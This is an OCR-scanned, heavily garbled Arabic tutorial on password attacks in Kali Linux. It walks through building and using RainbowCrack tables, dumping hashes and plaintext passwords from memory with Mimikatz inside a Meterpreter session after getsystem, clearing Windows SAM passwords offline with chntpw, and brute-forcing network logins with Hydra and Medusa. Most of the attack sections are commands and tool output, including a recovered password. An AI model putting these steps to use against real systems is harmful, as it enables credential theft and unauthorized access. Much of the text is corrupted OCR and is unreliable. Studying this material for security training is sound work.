Remove Madvne Accounts 
Remove 



±1 



LM & NTLM hashes 



L oat packets: 0% 



Rainbowcrack 

http ://www.proi ect-rainbo wcrack. com 

^ Jj^ f ^V: .Rainbow table J if- c>M ^ ^""U (i^ 5 ja RainbowCrack 

Sc. t fllikj ^1 j j&^l j^£3 brute force cracker ^ ^ .u^W^ time-memory tradeoff 

J£ ^l^luil JjUj lJj^ jSI^JI j^Sl brute force cracker .time-memory tradeoff hash cracker a2*J1* 

plaintext-ciphertext ^} j3 ( . h > r *j RainbowCrack 6 j^VI \z*S j plaintexts 

^.I^jjVI ^j^j j ' J j^'^J^ l-jLoi^. ^.j^ ^2 j (jjxlujj ^ .rainbow table c j j^f* ^—^ j ^ ^ 

.<c jjaijj j^joij Rainbow table J ^ jiu^l o-^ill CjI jLill ^^Ic Sj^lS (Jj^j ^ jjuj 6l_jLoi^JI 
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RainbowCrack 15 



File Ed A Rainbow Table Help 



Hash Plaintext 

0 c2 5 5 1 02 1 Sf € 51 9£ 1 2 £=9be 6 6 2 a € ?b*« 0 ? 

H Sebe ?df *0 1 4 daftee S n«fif aa 2bbde8 7 6 apple 

[y] 4£p£dcdd222 5 3L2733e*i6967b2Scl02 5 green 

V 2si2 0d2S2a47 9f4€5cdrSel71d939S5br qwerty 

H Oct5694aa0Sf797bf2aia2CO7973ba9&a7 test 



Flaincejti: ir. ftex 

<17070fic«S 

71776572747 9 
74*57374 



'._t._:. 

Martin. 

Juggyboy 

Jason 

Shiela 



Ke jjaies 



tine of alarm- rhpf.fr : 
tine of wait: 
tire -t ether rperot::".: 
time of disr read: 

hash £ reduce calculation of chain traverse: 

hash £ reduce calculation of alarm cheer; 

number off alarm: 

speed of chain traverse : 

speed of slant cheer: 



2.14 3 
0 . 00 - 

0,17 a 
0 + 59 s 
143eSDD0 
3591€594 
57632 

11,11 million/ a 
16.62 million/a 



.JLLa j2lt [rcrack *.rt -f Crackme] J^uJI J^-* £>a Lfral ,^Vihi) ££a4J ^JbS J Au lLII ^Uaj ^4 SIjSM aifc :4Jajala 

luaj) o^-aj ^IS JjLil!) ^Uaj ^4 m( Jtyl\ cij^au ^iH uiUil crackme til^M J^j Rainbow table [*.rt] 
4jL^li j*j ^UIj [rcracki_mt -h hash rainbow_table_pathname] 4jL£ JMj^ L^ajj rainbow crack ^l^l^l 

a A ftj < nil <j-<a AjJ^a 

#rcracki_mt -h hash rainbow_table_pathname 
#rcracki_mt -1 hash_list_file rainbow_table_pathname 
#rcracki_mt -f pwdump_file rainbow_table_pathname 
#rcracki_mt -c lst file rainbow table pathname 

jLdu^JI ^4 Sjjaj^JIj rainbow table ^I^oujI JI& j jlSfl cjIjjS?) <j^a*j j^jj JjLiUI ^Qaj ^4 Liajj 

,/usr/share/rainbowcrack/ 
rainbow table f LAW f iVmn ^ill r tgn 



root^kali : /usr/$hare/rainbowc rack# . / rtgen md5 lowe ralpha-numeric 1 5 G 389G 335 
54432 © 

rainbow table iud5_loweralpha-numeric#l -5_G_3800x33554432_0 . rt paramete rs 
hash algorithm: md5 
hash "Length: 16 

charset : abedefghij klmnopqrstuvwxyzG1234567B9 

charset in hex: 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 7Q 71 72 73 

74 75 76 77 78 79 7a 3G 31 32 33 3A 3b 36 37 38 39 
charset "Length: 36 
plaintext "Length range: 1-5 
reduce offset : Gx GG0GGOG© 

plaintext total : 62193780 



sequential starting point begin from 3 ( 0X0GGQGG0GG9GG0GG0 ) 
generating. . . 



.rainbow table J^W hA±l\ ^jlSft qaxij 13jL« tj-te Ui±aJ ^311 Rcrack 
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Mimikatz Tool to Recover Plain Text Passwords 



t^uz^lA O^J t^Jxij La cJ*^ t ^ JaJjJalU ^-9l Jjl (^"^ (jl LI .C^-^C- (J^aj J Asu (jC JjuJI t ** )1 &l£ 6 AiU.ua I <JjLlj L_fl jjuj S-^^ ^ J 

Jl AiLjaj j < jj^jjj J^^ll Jo Ja*j jVI £*L ^Mimikatz p-al ^ .(windows process) jj^jll J^ 
.oAisu iuok. tiL^ uj^ ^ cjUK s^Uiuil Jx^j Lu> ^Meterpreter *^ j Metasploit J-H 
axj cjISjVi c> j£&& ^L& .(Benjamin Delpy) u^W^ J^ post-exploitation sbl Mimikatz 
La Ullc. j .A£djuj|/jj jjj^ll Jc IjUj ji&l ^ Ja Jc J jj^a^JI J I jjc. jj aS ^ &i j <l^L aJ jl exploitation ^-^^>^ 
^jj-A^l^xJI L_ic. jj c^jjuj Jilj o^jli ji&VI ^l^all Igiajj] aJjL^ ^ Mimikatz Aj\:*^ I ^-jIj^VI ^ 

-W* J 

.Microsoft jj^ 5*21 4J jU^ J <<>Vt fgAli* <jiju cjUjV Oj^j <>' ^ J*-* 5* 2007 ^ LjJUiit ^ SbVt aifc 
Ijja (JjjxaII <jVI ^ Wimlj . WindowscM 5* ^J^' 6* *^JjC ^«2J t4*i*a ^L-uSfl J Sbl ^AMimikatz 
&\ I j IS aj Mimikatz .SjSlil! <> Kerberos j^l^j PIN >j <o^' 'plaintexts ajki* jj£ iijA ^fe j^Jl cjUIS ^tjaa^iV 
L-alaJl ^jjLiaJI jl certificate v^!^ ,build Golden tickets jt pass-the-ticket 'pass-the-hash ^^J 2 

?Sj$ilt ... * vault '(private key) 

ciii JjJI ^ <Ll£ <c J jU ^LuJl meterpreter Mimikatz Metasploit ^jjS tfeaJI c>^ 



M^xili Si^lj 4-4j^£ v2.0 J«^W C^h^i 2^J 6 vl.O metasploit ^ Mimikatz jt^! 

jS) j-J) J^U t$Jp Jj^aJl ^jIojj ,v2.0 J! M J^' J- 4 ^ ^ J-<^ ^ dip. .Cij jjjV) Jp A*S j-ft Jp 

or directly 

https://github.eom/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20140505 
jl^aV) Jj-aaj jl metasploit Jl ^ rapid7 cfeS <> meterpreter J^Jt jl^VI 4iLia) ^ 

: JUlt jSj^J) &a metasploit JJ o^^LaJ) 
https://github.com/rapid7/meterpreter/tree/master/source/extensions/kiwi 
https://github.com/rapid7/metasploit-frameworlJtree/master/lib/rex/post/meterpreter/extensions^^ 



Loading Mimikatz ^ 

diljLii«l ^ lU*^ Jlt(session) <^kJI jl ^ ^hll a^Uj meterpreter J^ Jj^^lj exploit ^ 

Mimikatz lU*^ ^ (System privilege) c5 i 1 ^ 



meterp reter > getuid 

Server username: NT AUTHORITY\SYSTEH 



; JVI^ getsystem c^Ja ^ system cj! jUi^l Jl Ji±ai c jl<ua system ^U^W V ^ lij ^> 



ir.e t e rp reter > getuid 

Server user name : WINXP-E 9 5 CE 5 7 1 Al \Admi nist rat o r 

me t e rpre t e r > gretsystem 
. . .got system (via technique 1} . 

me t e rpre t e r > getuid 

Server username : NT ADTHORITY\ SYSTEM 



c> ti^iJ! J] ^UUj ^ SYSTEM cjIjU^I J! aAJU ±u .bit64 j bit32 ^> ^ Mimikatz 

c-LLoaj lJjjoj jllj ULoj jjjj J li^i bit32 »li Mimikatz J^4? ^ bit64 ^ ^j ."sysinfo" j^Vl ^ 
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meterpreter > 


sysinf o 




Computer 


: TEBA-293DD90F08 




OS 


: Windows XP (Build 2600, Service Pack 3). 




Architectu re 


: 186 




System Language : enUS 




Mete rp reter 


: i86/win32 




^ .load mimikatz j*VI ^l^i^U o-aUJI MimikatzJ^^ bit32 yr* ^ u' ^ 




■help c&J^ j*\ jVl c>a .load mimikatz.64 j*VI ^.iki^a bit64^t 




meterpreter > load 


mimikatz 




Loading extension 


mimikatz. . .success. 




meterpreter > help mimikatz 




Mimikatz Commands 






Command 


Description 




kerberos 


Attempt to retrieve kerberos creds 




livessp 


Attempt to retrieve livessp creds 




mimi k a tzc omma n d Run a custom comma nnd 




msv 


Attempt to retrieve msv creds (hashes) 




ssp 


Attempt to retrieve ssp creds 




tspkg 


Attempt to retrieve tspkg creds 




wdigest 


Attempt to retrieve wdigest creds 





(JjIj jj <j2A$]l <yj^j < Mimikatz <J1 ^l^luiVI jSSVl s j^ll U3 yr^ ^ Metasploit 

j^VI jli 4t*Bi .SjSlill Sj^Ux (dumping hashes and clear text credentials straight) uP lk^j*^ 

.Mimikatz ^ ^ ^ cU^ll J jll Ul ^jjj "mimikatz_command" 



meterpreter > 


mimi k a tzc omma n d -f version 


mimikatz 1.0 


186 (RC) (Dec 4 2013 16:18:53) 


meterpreter > 


mimikatz command -f fu:: 


Module : 'fu' 


introuvable 


Modules disponibles 






- 


Standard 


crypto 


- 


Cryptographic et certificats 


hash 


- 


Hash 


system 


- 


Gestion syst^me 


process 


- 


Manipulation des processus 


th read 


- 


Manipulation des threads 


service 


- 


Manipulation des services 


privilege 


- 


Manipulation des privileges 


handle 


- 


Manipulation des handles 


impersonate 


- 


Manipulation tokens d'acc^s 


winmine 


- 


Manipulation du d$mineur 



Reading Hashes and Passwords from Memory 4- 



<> clear-text credentialsj lW jrlj^V Mimikatz metasploit c> jJjVl <> f\mJ U&aj 



meterpreter > msv 

[+] Running as SYSTEM 

[*] Retrieving msv credentials 

msv credentials 



AuthID 


Package 


Domain 


User 


Password 




0;996 


Negotiate 


NT AUTHORITY 


NETWORK SERVICE 


lm{ aad3b435b51404eeaad3b435b51404ee }, 


ntlm{ 31d6cfe0dl6ae931b73c59d7e0c089c0 } 


0; 38315 


NTLH 


TEBA-293DD90F08 


JANA 


lm{ aad3b435b51404eeaad3b435b51404ee }, 


ntlm{ 31d6cfe0dl6ae931b73c59d7e0c089c0 } 


0;997 


Negotiate 


NT AUTHORITY 


LOCAL SERVICE 


n.s. (Credentials K0) 




0; 30615 


NTLM 






n.s. (Credentials K0) 




0;999 


NTLH 


WORKGROUP 


TEBA-293DD90F08$ 


n.s. (Credentials K0) 
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rainbow J j-^ Cy* * b» j> ^jjo£ jL^q j (j^l^JI ^1 jiljl cili£ ^ . jjj^ ^L$j cdiSaxj msv ^ — — 

jll ^ ^ jill 11a liul j£j ^3 jl liU (j^lj tdijjljVl table 

.kerberos ^y^\ aJc& cilj£ ^ \ g us ^Uaill J j^Jl Jj> > >nj ^iklauJI iaia ^jIj lLu^. tcilli LLiia> 



meterpreter > kerberos 






[+] Running as SYSTEM 






[*] Retrieving kerberos credentials 






kerberos 


credentials 








AuthID 


Package 


Domain 


User 


Password 


0;999 


NTLH 


WORKGROUP 


TEBA-293DD90F08$ 




G; 30615 


NTLH 








0;997 


Negotiate 


NT AUTHORITY 


LOCAL SERVICE 




0;996 


Negotiate 


NT AUTHORITY 


NETWORK SERVICE 




0; 38315 


NTLH 


TEBA-293DD90F08 


JANA 


mo ramt58 


0; 477161 


NTLH 


TEBA-293DD90F08 


JANA 


mo ramt58 


0; 577336 


NTLH 


TEBA-293DD90F08 


JANA 


mo ramt58 



i^Vl^ wdigest ^I«^LuiIj c _ 5 ic- <J jj^^JI 



meterpreter > wdigest 






[+] Running as SYSTEM 






[*] Retrieving wdigest credentials 






wdigest credentials 








AuthID 


Package 


Domain 


User 


Passwo rd 


0;999 


NTLM 


WORKGROUP 


TEBA-293DD90F08$ 




Q;997 


Negotiate 


NT AUTHORITY 


LOCAL SERVICE 




0; 30615 


NTLH 








0;996 


Negotiate 


NT AUTHORITY 


NETWORK SERVICE 




0; 38315 


NTLH 


TEBA-293DD90F08 


JANA 


moramt58 


0; 577336 


NTLM 


TEBA-293DD90F08 


JANA 


moramt58 



<j^aLk]| J j^-^ lSj^ » ^ ^U^V (^jjjj^iyi ^j^i l-jLoi^. ~ ikiLujj Win 8 ^ Cy* ^jaxJI q\ "livessp" ^^j> 
a > *al \\\ ^ jji&W! ^jJi j ^iklauJI ^jujI *\ jjoj Aa. a^j a > *al ^1 jj^Jt ^^ic J jj^a^J! ^1^-^Miniikatz 



4ijjks jjj^J) ^ J j^aaii mimikatz_command ^ l^ll^t L*Ji £>£aj 



Password Resetting: The Building and the Wrecking Ball 

'{Live CD ISAjui UliaJ) l_a^JI Jig a 11 C5 i*i3l J jj^a jll < . illalj ^1 C5 i^ ^ ^ Ajjilll . jjuJI CjUJ£ j.u£3 j^J jU^ 

(JSl l_j jLojVI li^ ttilli ^ j > ^all jl ^Uaill J jj^a jll lg-x>l^luil (j^j ^jII t_j jLojI Password resetting 

^Ikj C5 lo ^^kiaiA sai^ jjj* A-*!& ^Uijjj SAM <-iLftSI <jUi3U ^lg-*3 ^joij ^ Password resetting 
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(jjlisu D^lcl ,\iqV^ .^^aj <J jj^ jll <J^j (j-a 1^. .llLa (jj^J (jl (j^J J (j^> V cJ^-^ ^dj^ *^ s-^- 3 (jc ^>lai3l (J^*^ 

^ jjSJI cil^j .SAM < cSj 1 ^ ^ o- 8 * 1 j 5 ^ ^ J) ^ ^ 

^j-<i ^jjoi (3^^ ^ ^1 6 ^ CljUuisLill 



[chntpw -h] 



;^JU]| j-dVI il^A j^jV .t V^'im^l ^^-Sc J jjjoiaII JJJ-a (jjlisu S^lc] ^JjJ tiljl (jiajjal 



#chntpw©i©/mnt/sdal/WINDOWS/system32/config/SAM 



4_ilc.\ij JjixjaLil ^a^JjaaJ "-i" jjjtMIj . JjJ>Jl (jjJjistJ e^lc] £l^U^)J "chlltpw" l^Loai ib^kc*\ j-aVI 

"mnt/sdal/WINDOWS/system32/config/SAM/"j s^j ^ ^ill ^^1^31 ^1 jlii^l tSXS di^ (interactive) 

.cJi^Jl jl^aJl ^ SAM j 1 ^ ls'^ > 

jila^JI ^Vim^ti jj^y^^ S^lcU till ^ajoij ^jl l^jLuj ^^jII ^LajIsII CjIjU^JI <LuoLoj ^1 ciLoj^j ^jj > o t l!^*-^ 

JLk^j <LLauj .l^iij jUlk^ CjljlrkJI ^ a^I nilni 4 JI^joJI Jja " What to do" J*ii bU cdid l-ALj JjVI JI>JI 
"i" jbikl jl jjAj JI^joJI axj "[1]"j .<xjHJ3 "Enter" ^l^aJl ^ j^j ^ ^ill jl^J! ^ ^ill j^JI jl ^ Jl 

.^1 j^V! jlii^VI 



<>"—----- > ctinipw r-iam Interactive Menu ^>======<> 

Loacec hives; </in nt/5dal/WirirJows/Systenii2/cor fig/5 AH> 

1 Edit user data and passwords 

9 - Registry editor, now with full write support! 

q - Quit lyou viU be asked if there is something to save) 



What to do? Jl] -> 



Chntpw interactive menu. 

^l^cVl <J Enter c3j^ jfa [1] t , ^ c5^j 'l1j3 ju1 *^ ( ♦ ^ uda ^ jj^>^^ u^*^ *^lcV < 4 tiA UlUa ^ 

c_j jllaxJI ^^kiaixJI cili£ -C5 i^<JI Windows cf^* *^J^ ^jj^n^l.^U ^.LujjIj ^-Ajla Ul aJUII d jJaaJI -C5 jJal jliaVI 

^ <Jai3 J£Ja3l ^jjijj ."Administrator" c^-^^J^^^ j^^^ ^vi>»n t^^kl -L pa j^-^ nn^l l^j^ 3 

.^jj^IIaH Q±a^ 



===== chntpw Edit User Info ft Passwords ==== 

I RID -E UscrnaBC ! Adnln? 1- Iwk? --[ 

: i-'ii i : iv;->iiii:.ir..-Hi : rtDnirt : dis^t^k : 

: oif& g «u«st s : MSUfffii i 

I 63e8 t MelpftsststArtt E 1 ( 

I 03cb E Hflygiu ! fl&tllfl \ M.^i^l- I 

i 63fcc E Holly S flWIin i A is/ lock E 

E OJea E WPCRT_300345ft9 I J d is/ Jock E 

Select: f ^ qiiit, . - J ist users, &sc;R ID> - User with R CD Ehcx) 
or ainpty enter tike uscrnane to change; CMn in ist rater 1 



List of available users to reset password. 
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J <j| ^^JJ . <j£ai3l J c V^lm^l jl^aJl Jc ^Vlm^l ^jojI jjjaal (Jilt jLaJt t '<A'W a U3 ^^flJ 6<JU3l a JaaJl 

! C5 jJal jjaVI j^Jl J jii J 4-^ jj 4 * 



• ■ - ■ user Edit Heno: 

1 - Clear iblanK} us** password 

2 • Edit (set new) use password ^careful wiih this an XP or Vista) 

3 ' Promote user (nake user an administrator J 

4 - Unlock and enable user account [probably locked now] 
q - ouit editing user, back to user select 

Select; [q| > 1 
Password c lea red 1 



Chntpw user edit menu* 

csIjSaj £>i* tic "[password cleared " j J^ ^jjui < CjUK ^ju^ ^> Enter J^ Jkl'j 

aJLojj jj^ Jl Jll j .^UjJI " q " Jaol tl^Jj Jll 4^jU1I J .cjLqII o-ajsll Jc SApaJI SAM ( ^1 ^3 

(n) 

" reboot " J^ ^>JI Jjj uS2ll ^Lkj LJliij <^ ^ .^Ji ^-al j jiLkl ^vim^ jjJI jVl ^ 

# <c. jli jj^Jl tiljj <J!)tk ^ l-jL li J ' ^ ^ 6 \VindowscJ^*-^ *^lcl lie .DVD 

bC 3j15^ 5 t> JSl 

Resetting a Password on a Domain Controller 4^ 

.Active Directory J ^j j « SAM J j^ ^a^ U ^UJI j^JI cjUK j jaJ VWindows domain controllers 
. ^Ic-V ( alSaua ^ iUJl ^jj dipa t (offline) ^ j^j^ V Active Directory 

.(Active Directory Restore Mode) Active Directory uj^ Windows domain controllers o^j^ 
^^i^j ^ j jli 4 Active Directory ^ ^ .defragmentation J Active Directory ajU^J ciUi ^ U tAc j 
SAM c5j^' *j* lJj^j JauJI ^ ^" .. i^ l Aii-^i* Jj j^xj (Windows domain controllers) o^j^ 

Restore Mode ^ jit J ^jJI Active Directory Jl >»VI I^a (>j (dumping jt SAM 

Cj! jLiLdl ^) net user j-*^ Jll 4^^a. cIujjj ^jj t J ja.JI ■ ^ ^^^-aj .qjj*^^^ j) <Ua*-<J! <-<J£ ^ J j^-^ cJj? 1 
Jj^xj jl AiLjaU ^^kJI ^ jSj j t Active Directory Jj*^j j cJ^-*^ s^lcj ^ja^j .(SYSTEM 

http://www.nobQdix.org/seb/win2003 adminpass.html 

Resetting Linux Systems 

^Uaj ^ jl single mode J M lS^*-*^ *^lcj .root jj^>^ diL^lS s^lc-V <BUui ^-uij ^lAaJ ^jj t^jn^nl J 

http://linuxgazette.net/ 1 07/tomar.html 

.Online Password Attack j*j cjIj^VI c> 
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Online Password Attack: Gaining Access to Remote Services 

jjjlixll (IP) ^—^J^VI <J J^J^ CP" ^ > ^ ^ djUa^.!>L<i £j^aj Lajta iililc < . la>Jfl '(FOOtprinting) 4jjA51I S jiaaJI ^cjU <jlal jxluil ,jjc 

jko, J jS jij^j <VNC ' PCAnywhere^ < (FTP)'Telnet « (SSH)l£- 

.*J*J jc J jj^a jll 4_x».la> j* £ jj j a > ^aJJ jll 

lJ\ c/AAj uW^' i> J ^-*^l Jj Jjj^jII jV <jj*-^ jSSVl £il jUaJI ^ (remote desktop protocol) u&J I 
." Online Password Attack" J] J jjiLA&ll jti tdjU^kll £>i& j-* s^l j lJL£&I .lAj^II jl^J <LA£1I Sjia^l 
jVI lU*^ J^L&i Jllj f ^ " Online Password Attack " ^j^i <l_jIj£1I 11a jilj 

brute force Attack c> lU^ Online Password Attack .Telnet J SSH "live service" 

jjju>£ Cjljjij UlLa. tJjlLJI J .ciAjj£jj jl ^lqAsJLuiaSI ^UjjujIj jjuJI cA &K1 <LaLuj 4^jla ^I^jjujI ^UjLa^ J^Lk j-a ^Uajll Jj <LjIa 

. Jj*j&1I ^ ^iaJI jj£2 jl ( jlVin V (Offline Password Attack) jjj^t 
jJt A ja^ll liA ^Jaj di^ lij 6 jjj£ <jjouj ^jjj jl j£*j ^-UjJI jli 'Online Password Cracker ^l^i^l 

jl ^jA^AaJLuiASi ^UjjujI j-a J Jc ^ ^1 j* ,j£tjj (jl t ; laJ Ij laJill Jc- _ \ o jlaaJI J CjU» jLlaII £-<^ l^Jfl ^JJ Jillj Jj*^ 

^j^JI jj Ua L-jlkjj (Online Password Cracker) ^ JjV' jt^ . c-iLfr& l Jll jj>^l 

^gUjj (Jj3 j>» Uaa* 4_lLaij jlajc ^JJ i u ^ a^ia >■ ^ jjc. JJJ>JI ^-^1^ jl ^ laJLuiASI ^jujI Loj jl£ lili _L_fl^i3 JjJ-« ^ laJLiba ^jujI (JLujjV 

JJ (J^> 4_iL<iJL!l JALalJj _4_Jlj3l JJJ-<JI ^ laJLu^Q ^jujI <Jj£jJ (jLoJjU ^J^J tilli AsU ^aJ _(J J^^ll (JjiauaaJ (JjuoflJjoJj ^ g II 

(jl (j-<4 J^ ^"^^ J^ .^c^ 1 ^W^) UJ 1 ^ (>< ^ liAaJlSl J£ (^-^ ^1 jl <J^iau^3l JjJ>» 4_aK/<J j^.^31 (J^auoiJ Jc JjJ«-!l J ^x»Ujj3I 

_U» lc jj A lilaJ <j1asl!I dAA (j^Jj 66jj£lL<Jl ^1^-a3I (J!L<J 4 JJ^ a JJ jJJ^ll 6 j^_a*l 

^j^^ uj%^ J^^ .THC-Hydra password cracker (Hydra) ^^i^j ^ J 

uj^ t^j .^W^ (SAM) ^Jl J^ Jj^Jlj (physical attack) Sj^W^ Windows J^ull ^UaL J^xj jjjj^ 

djjjjVI aSliA jjc jjuJI jjo£ <js el ijjj ^ill ^jI£a!I jA 11a j ttillij ^Usll Jc (jjj^la jjc. <ja jaJ ^ill da jll Uiajl 

.sjSIS jSSVl (Online Password Attack) 

Jilj (password throttling) JJJ^I Jllikl uilajj J*j <y J>^^t ^ ^ L)J^ C)t 4^ ;4iajal4 

(j£> aJJ jl (j^taJt IP jl jjP jla^ aJJ jl jldJ cCj^laJl dift J .till l^J ^ j.o.uu,all 4luilil| Jjlill J;^ i uJ CjIj^ JJP i^J jl jldJ 

cj! j/VI j- jjjS! . (Online Password Cracker)^ >"VI J^ l^l^l^l j^ Jll <ili^JI cj! j^Vl c> ^ 

.l^c ^nla J 1^ ^jUi^ cj! jjVl ^ .(Hydra)U^ j(Medusa) ^ J^ J^^ ( 

. (password guessing)u^^^ yr* Jj^^^ j^ c-jlki a£jj^3I Jc^ *^ja.j^(service) 

j^i j SQL IM LDAP TELNET SSH RDP SMB VNC IMAP POP3 HTTP ^» lU^ j 

^j^^ cJ^I c> j^^l f^l J^ c5j^ (Online Password Attack) ^ JjV^ (* c> 

^.Ull jj^Vill j^ajfl jjjuaao j 



THC-Hydra Password Cracker (Hydra) 





http://www.thc.org : j^-a^ll 

. jjjJI jUI J ja. J£ J j^JaJ U£ i jjuJI CjUK ^ AjloVl CjIj^jII jj£I J ^a.l j 
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jbik^U brute force ? m ^IjH ^1 j The Hacker's Choice (THC) lS* i> ^ j^j^ 5 ^ 6 ^ gr* Hydra 
IP L-fll,^ unl \ $ i£ Hydra jj-^V^ 3^1^*1 aJIUI staVI .ialLk-all CjV j£ jj jjJI (j-a <c jjla <c j^ ^ 

>C5 j jj^JVl ^jJl 3 *lvil Jj£ ^ ^^klaiJISMTP j POP3 J ^j^Ji c_jLoi^ Ji* s^^a JjSjj jj^j 
.OSXj FreeBSD 8.1 'Solaris 11 <Windows/Cygwin 'Linux ^ ^ (V 3 ^ Hydra jW^' ^ 

:<^VI J-aj£5 j^jII j j£ jj jjJI ^ ^jaxJI f&si Hydra 

smb 
smbnt 
smtp-auth 
smtp-auth-ntlm 
snmp 
socksS 
ssh2 
svn 

teamspeak 
telnet 
vmauthd 

vnc 

. password brute force tool^ ^ j*l j j£ jj jjJI <> jjj£ ^ I .Nessus i> * j^j SSL ^ I <>a^jj 

<j^aj3 (j-a '^-(3^1 cJ ♦ ^ ^ 1 UJ-^ clA^ g II (j-G jjll I^A (jV ttilli CS"^ LS^ 0 UJ^ t « ^ J 

Q jflj i u 4il t *aj< jlgJal (j-aVl (^jLuiluilj (jjJ^.L3l s-UacV ^ij J£°^ A-ia ^j;^ CjUuLljII (J-g <Jj3,j j& obVI _tiljc. t ftjuj^ll 

_^Uai3l ^Jj .JJXJ <J ^- ^ ^ ^f*-^ (J J^^ 3 (J^->->i3l (j-a 

Password Attacks | Online Attacks | Hydra 

Jj^ia JjIxjulL ^ jij L_a jjuj j ^JLLdjlill siflU till L_a jjoj 11a J 



Hydra is a tool to guess/crack valid login/password pairs - usage only allowed 
for legal purposes. This tool is licensed under AGPL v3.0. 
The newest version is always available at http://www.thc.org/thc-hydra 
These services were not compiled in: sapr3 oracle. 

Use H YD R A_P RO X Y_H T T P or HYDRA_PROXY - and if needed H YD R A_P RO X Y_ A U T H - environme 
nt for a proxy setup. 

E.g.: % export HYDRA_PR0XY=socks5 ://127 .0 .0 . 1 :915G (or socks4:// or connect://) 
% export HYDRA_PROXY_HTTP=http : //proxy :8G8G 



• afp 


• https -form -get 


• oracle-listener 


ciscc 


• https -form -post 


• pc anywhere 


• cisco-enade 


• icq 


• pcnfs 


• CVS 


• imap 


• pop3 


• firebird 


• imap-ntlm 


• pop3-ntlm 


• ftp 


• Idap2 


• postgres 


• http-get 


• Idap3 


• rexec 


• http-head 


• mssql 


• rlogin 


• http-proxy 


• mysql 


• rsh 


• https-get 


• ncp 


• sapr3 


• https-head 


• nntp 


• sip 



sxpo rt HYDRA_PR0 X Y_A U T H =u s e r : 



Examples: 

hydra -1 user -P passlist.txt ftp://192.16B.0-l 

hydra -L userlist.txt -p defaultpw imap ://192 . 168 .0 . 1/PLAIN 

hydra -C defaults.txt -6 pop3s ://[ fe8Q : :2c :31f f : fel2 :acll] : 143/TLS : DIGEST -MD5 

root@JANA:~# I 



si^L, 4 SMTPfl^-W 192.168.1.1 

#hydra -1 admin -p /root/password.txt 192.168.1.1 smtp 
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' u( jN\ £US) jjjla cp JjLiU) ^Uaj hydra-gtk Aj^^jJI ^ili^i J^ajU 
Applications | Kali Linux | Password Attacks | Online Attacks | hydra-gtk 



xHydra 



Target Passwords Tuning Specific Start 



Target 



(■) Single Target 
O Target List 



127.0.0.1 



D Prefer I PV6 



ProtocoL 



afp 



Output Options 



D Use SSL 



D Show Attempts 



D Be Verbc 



□ Debug 



hydra -L yourname -p yourpass -tr l£j 127. O.O.I, afp 



^ .Passwords (jja j& .(Word list) ^-jI^I 0^ lJ jjuj J jjja ^ Uta ^ jVl 

.Try empty passwordj Loop around users 

Username List: /usr/share/wfuzz/wordlist/fuzzdb/wordlistsuser-passwd/names/nameslist.txt 
Password List: /usr/share/wfuzz/wordlist/fuzzdb/wordlistsuser-passwd/passwds/john.txt 



xHydra 



Target Passwords Tuning Specific Start 



Username 



@> Username 



^Username Lis 



yourname 



h w d/n a m e s/n a m e L i s t . t x t 



& Loop around users 



Password 



{•) Password 



Password List 



CoLon separated fiLe 



D Use CoLon separated fiLe 



D Try Login as password 



13 Try empty password 



hydra -L yourname -p yourpass -e n -t 1(3 -u 127. O.O.I afp 



'Performance Options .Tuning ^jf^ l^k. Jja jUU t*Ui ^Lj ^<LLJI SjIaiJI 

j ajjUJ! cjUUxJ! <> jjjSII ^axJI 11a ^ V UjI > cilli ^ j 2 16 l> (Number of tasks) fV 31 ^ ^ 
.ijc. jll ^ c^j^^ Exit after first found pair ^4 ^ lp^ .f^l u> t> 
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.^jjjII ^JlJft! cf. J^^t j$i Use a HTTP/HTTPS Proxy j^l 

xHydra 



Target Passwords Tuning Specific Start 



Performance Optic 



Number of Tasks 



Timeout 



O Exit after first found i 



Use a HTTP/HTTPS Proxy 

• No Proxy O HTTP Method O CONNECT Method 

Proxy 

□ Proxy needs authentication 



http://lZ7.0.0.1:8080 



Password 



I yourpass 



hydra -L yourname -p yourpass -e n -t 2 -u 127. O.O.I afp 



Target 
Target 



Passwords Tuning Specific Start 



® SingLe Target 
O Target List 



Z0Z.75.54.101 



O Prefer I PV6 



ftp 



Output Options 



□ Use SSL 



D Show Attempts 



D Be Verbose 



□ Debug 



hydra -s Zl -L yourname -p yourpass -e n -t Z -u Z0Z.75.54.101 ftp 



■ Start f jj ^ Start ^J^> ^ j^l <> exploit f jfc U3Li <lj*ilj 



Target Passwords Tuning Specific Start 



Output 

Hydra v7,3 (c)2Q12 by van Ha user/THC David Maciejak - for legal purpos< 

Hydra (http://www.thc.org/thc-hydra) starting at2012-Q8-29 07:27:17 
[DATA] 2 tasks, 1 server, 592695 6 login tries (l:1907/p:310B), —2963478 tris 
[DATA] attacking service mysql on port 3 306 

[ATTEMPT] target 192.168.10. Ill login M 0 M pass "" 1 of 5926956 |child 
[ATTEMPT] target 192.168.10.111 login "01" - pass "" 2 of 5926956 [chile 
[ATTEMPT] target 192.168.10 111 - login "02" - pass "" - 3 of 5926956 [child 
[ATTEMPT] target 192.168.10.111 login "03" - pass "" 4 of 5926956 [chile 



hydra -V - L /pervt est/w eb/wf u zz/w ord I i s t/f u zzd b/w ord I i sts -us er- pa sswd/,, . 4 



\ j ft^Jj CjV jj jjJI <j-a JjJslSI JLIj) (illS aj target <j-a 
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Target |j Passw ords Tuning Specific Start 
Target 




— »fp~ nu 



Protocol 



Output Options 



I I Use SSL 
[ | Sh ow Atte rnpts 



I | Be Verbose 



I | Debug 



hy d ra 127.0.0.1 aFp - L you rn arne - p you rpass - t 36 



#hydra -1 ftp -P passwords.txt -v 192.168.0.112 ftp 
#hydra -1 muts -P passwords.txt -v 192.168.0.112 pop3 
#hydra -P passwords.txt -v 192.168.0.112 snmp 



Medusa: Gaining Access to Remote Services 

£>j^ta Loj jAiaI! .axj ^jc ^Jjj jiill djUi^k J jj^a jll J j brute forcer l£ jl <-! Jj> * ^ aj! ^^ic Loj jAiaI! c *q>^> j 
Microsoft SQL j IMAP 'HTTP 'FTP 'Apple filing protocol ^ ^ ^ t> CjU^JI ^> ^ ^ aSjL^I! ^ 
'POP3 'PCAnywhere g^jjj 'network news transfer(NNTP) 'NetWare core protocol(NCP) 'MySQLj 
'VNC 'TelnetjSSHv2 'simple mail transfer protocol authentication(SMB) 'RLOGIN 'REXEC 
,t*Ui t> jSSl j 4 (Web forms)s^ £^ 'simple network management protocol(SNMP) 
.[medusa — d] ^VIS — d ^l>ikU J^U. ^ c*ili ^I^j l^c^j ^\ j£ jj jjJI ^jjj^ j 



oot@JANA:-# medusa -d 
ledusa v2.0 [http://www.foofus.net 
>t> 

Available modules in "." : 



] (C) JoMo-Kun / Foofus Networks <j mk@foofus .n 



